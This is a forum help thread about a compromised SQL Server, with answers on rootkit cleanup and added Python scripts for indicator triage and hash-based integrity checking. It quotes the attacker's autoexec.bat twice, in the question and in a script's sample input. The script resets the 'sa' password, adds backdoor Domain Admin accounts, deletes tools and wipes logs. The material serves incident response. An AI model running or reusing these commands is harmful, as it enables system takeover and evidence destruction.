Autoexec.bat modified on SQL Server

Posted on 2005-04-12
Medium Priority
Last Modified: 2013-12-04
I was notified by my data center that my bandwidth went up 500% on my SQL Server. Upon investigation we found an exe running (info.exe). Rebooting the server stops the file from running, but a search cannot find the file, and it keeps reappearing. The box has real-time virus protection running (and yes, it is up to date); we also run spyware detection. After further investigation we found that the autoexec.bat had been modified as follows:

@ECHO off

osql -E -Q "sp_password NULL,HOLLOWM@N,sa

net user IUSR_ROOT HOLLOWM@N /add
net localgroup Administrators IUSR_ROOT /add
net group "Domain Admins" IUSR_ROOT /add

net user Admin HOLLOWM@N /add
net localgroup Administrators Admin /add
net group "Domain Admins" Admin /add

del c:\ftp.exe /S
del c:\tftp.exe /S
del c:\tftpd.exe /S
del c:\cscript.exe /S
del c:\wscript.exe /S
del c:\telnet.exe /S
del c:\nc.exe /S
del c:\save.bat /S
del c:\rcp.exe /S

del c:\ftp.exe /S
del c:\tftp.exe /S
del c:\tftpd.exe /S
del c:\cscript.exe /S
del c:\wscript.exe /S
del c:\telnet.exe /S
del c:\nc.exe /S
del c:\save.bat /S
del c:\rcp.exe /S

del c:\*.log/s
del d:\*.log/s
del e:\*.log/s
del f:\*.log/s
del g:\*.log/s
del h:\*.log/s
del c:\d.txt
del c:\do.txt
del c:\doc.txt


Any ideas?
Question by:cooperrd
LVL 12
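The script quoted in the question is a compact checklist of what the intruder wanted: an `sa` password reset through `osql -E` (Windows authentication, so it works without knowing the current password), two new accounts pushed into Administrators and Domain Admins, the usual transfer tools removed so nobody else can use the box, and every `*.log` wiped. The following triage script, an added example that is not part of the original post, pulls those indicators out of such a batch file so they can be handed straight to whoever resets the credentials. The sample input is a constructed, trimmed copy of the posted autoexec.bat; the indicator categories and function names are this example's own.

```python
"""Triage a suspicious batch file for the indicators seen in the autoexec.bat
above: accounts created, privileged group membership, SQL 'sa' password
reset, tool removal and log wiping."""
import re

# Constructed sample input: a trimmed copy of the script quoted in the question.
SAMPLE_AUTOEXEC = r'''@ECHO off
osql -E -Q "sp_password NULL,HOLLOWM@N,sa
net user IUSR_ROOT HOLLOWM@N /add
net localgroup Administrators IUSR_ROOT /add
net group "Domain Admins" IUSR_ROOT /add
net user Admin HOLLOWM@N /add
net localgroup Administrators Admin /add
net group "Domain Admins" Admin /add
del c:\nc.exe /S
del c:\tftp.exe /S
del c:\*.log/s
del d:\*.log/s
del c:\d.txt
'''

# Groups whose membership grants host-wide or domain-wide control.
PRIVILEGED_GROUPS = {"administrators", "domain admins", "enterprise admins"}

_USER_ADD = re.compile(r"^net\s+user\s+(\S+)\s+(\S+)\s+/add\b", re.I)
_GROUP_ADD = re.compile(r'^net\s+(?:localgroup|group)\s+("[^"]+"|\S+)\s+(\S+)\s+/add\b', re.I)
# sp_password old,new,login; the closing quote is missing in the sample, so do not require it.
_SP_PASSWORD = re.compile(r'sp_password\s+([^,\s"]+),([^,\s"]+),([^,\s"]+)', re.I)
# "del path /S" and "del path/s" (no space) both occur in the posted script.
_DEL = re.compile(r"^del\s+(.+?)\s*(?:/s)?\s*$", re.I)


def extract_indicators(batch_text):
    """Return a dict of indicators pulled from each line of the batch file."""
    ind = {"accounts": [], "privileged_adds": [], "sql_password": [],
           "deleted_files": [], "log_wipes": []}
    for raw in batch_text.splitlines():
        line = raw.strip()
        if m := _USER_ADD.match(line):
            ind["accounts"].append((m.group(1), m.group(2)))
        elif m := _GROUP_ADD.match(line):
            group = m.group(1).strip('"')
            if group.lower() in PRIVILEGED_GROUPS:
                ind["privileged_adds"].append((group, m.group(2)))
        elif m := _SP_PASSWORD.search(line):
            # (login, new password); the old password is irrelevant when run via -E as sysadmin.
            ind["sql_password"].append((m.group(3), m.group(2)))
        elif m := _DEL.match(line):
            target = m.group(1)
            if target.lower().endswith("*.log"):
                ind["log_wipes"].append(target)
            else:
                ind["deleted_files"].append(target)
    return ind


def backdoor_accounts(ind):
    """Accounts that the script both creates and places in a privileged group."""
    created = {user for user, _ in ind["accounts"]}
    return sorted({user for _, user in ind["privileged_adds"] if user in created})


def shared_secrets(ind):
    """Passwords reused across created accounts and the SQL login: one
    credential the attacker expects to work everywhere, so every one of
    these principals must be reset together."""
    seen = {}
    for principal, password in ind["accounts"] + ind["sql_password"]:
        seen.setdefault(password, set()).add(principal)
    return {pw: sorted(users) for pw, users in seen.items() if len(users) > 1}


if __name__ == "__main__":
    found = extract_indicators(SAMPLE_AUTOEXEC)
    for key, values in found.items():
        print(f"{key}: {values}")
    print("backdoor accounts:", backdoor_accounts(found))
    print("shared secrets:", shared_secrets(found))
```

Run it against the real file (`extract_indicators(open(r"C:\autoexec.bat").read())`) from a clean machine, not from the compromised host, since whatever re-creates info.exe may also be watching what is read there.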

Assisted Solution

rossfingal earned 400 total points
ID: 13764187

Looks like a "Rootkit"
Download and run these (free):
Rootkit Revealer
F-Secure Blacklight Rootkit revealer  

Good luck!
LVL 12

Accepted Solution

Phil_Agcaoili earned 1600 total points
ID: 13765157
If you can't figure out the entry mechanism, you may have no choice but to start from scratch.

You definitely have a rootkit and it's custom from looking at your modified autoexec.bat.

Here are some other resources to shed light on what has happened:

Cleaning Up after a Rootkit attack:
Once you discover a compromised host, you must determine the extent of the attack. You must presume that all network transactions from or to any host "visible" on the network for the duration of the compromise were monitored and that intruders potentially possess any or all of the information so exposed. You should perform recovery and prevent future attacks as described below.

Disconnect the host from the network or operate the system in single-user mode during the recovery. This will keep users and intruders from accessing the system.

Locating Trojan versions of the standard system programs can be difficult, and you should be cautious in doing so. The intruder may have installed other Trojan programs not part of Rootkit, therefore all system utilities should NOT be trusted unless restored from distribution media or a floppy disk as discussed above. This especially refers to cd, dir, mkdir, etc.

I advise that an entire system install be performed from read-only distribution media. If this is not feasible, all system binaries should be compared using a known good copy of md5 against the read-only distribution media. Since rootkits install Trojan programs with the exact checksum and timestamp as the legitimate version, these attributes cannot be used to find Trojan programs. However, cryptographic checksums are nearly impossible to spoof. Therefore, md5 from the read-only floppy described above can be trusted to compare installed programs against the distribution media or known correct checksums.

Resist the temptation of restoring from backups, unless it is positively known the backups were made before the Trojans were installed. Otherwise there is too great a chance the backups contain the Trojan programs, rather than the legitimate ones.
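The comparison against read-only media that the answer above recommends, as an added example that is not the answerer's code: build a manifest of cryptographic hashes from the trusted tree, then hash the installed tree and report anything modified, missing or unexpected. The demo constructs two temporary directories and plants a replacement `dir.exe` of identical length with the original timestamp copied back, which is exactly the case where size and mtime checks pass and only the hash catches it. SHA-256 is used instead of the answer's md5; the procedure is the same, but md5 collisions are practical today, so prefer a modern hash when you have the choice. The directory and file names are invented for the demo.

```python
"""Compare installed binaries against a manifest of cryptographic hashes
taken from known-good media, the check described in the answer above."""
import hashlib
import os
import shutil
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map relative path -> SHA-256 for every file under root (the trusted media)."""
    manifest = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def verify_tree(root, manifest):
    """Return sorted lists of (modified, missing, unexpected) relative paths."""
    installed = build_manifest(root)
    modified = sorted(p for p, digest in manifest.items()
                      if p in installed and installed[p] != digest)
    missing = sorted(p for p in manifest if p not in installed)
    unexpected = sorted(p for p in installed if p not in manifest)
    return modified, missing, unexpected


def demo():
    """Constructed scenario in temporary directories: a trojaned dir.exe that
    keeps the original size and timestamp, plus a dropped info.exe."""
    base = tempfile.mkdtemp()
    try:
        good = os.path.join(base, "distribution_media")
        live = os.path.join(base, "system32")
        os.makedirs(good)
        os.makedirs(live)
        originals = {"dir.exe": b"MZ legitimate dir command",
                     "cmd.exe": b"MZ legitimate cmd shell"}
        for name, body in originals.items():
            for folder in (good, live):
                with open(os.path.join(folder, name), "wb") as f:
                    f.write(body)
        manifest = build_manifest(good)   # taken from the read-only media

        # Attacker swaps dir.exe for a same-length body and restores the timestamp.
        trojan = originals["dir.exe"].replace(b"legitimate", b"backdoored")
        live_dir = os.path.join(live, "dir.exe")
        with open(live_dir, "wb") as f:
            f.write(trojan)
        st = os.stat(os.path.join(good, "dir.exe"))
        os.utime(live_dir, ns=(st.st_atime_ns, st.st_mtime_ns))
        with open(os.path.join(live, "info.exe"), "wb") as f:
            f.write(b"MZ dropped tool")

        now = os.stat(live_dir)
        modified, missing, unexpected = verify_tree(live, manifest)
        return {
            "size_equal": now.st_size == st.st_size,      # naive checks pass...
            "mtime_equal": now.st_mtime_ns == st.st_mtime_ns,
            "modified": modified,                         # ...the hash does not
            "missing": missing,
            "unexpected": unexpected,
        }
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print(demo())
```

The manifest must be built and the comparison run from a trusted environment (booted from read-only media, or with the disk mounted on a clean machine); a kernel rootkit on the live system can serve the hashing tool the original bytes while executing the replacement.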
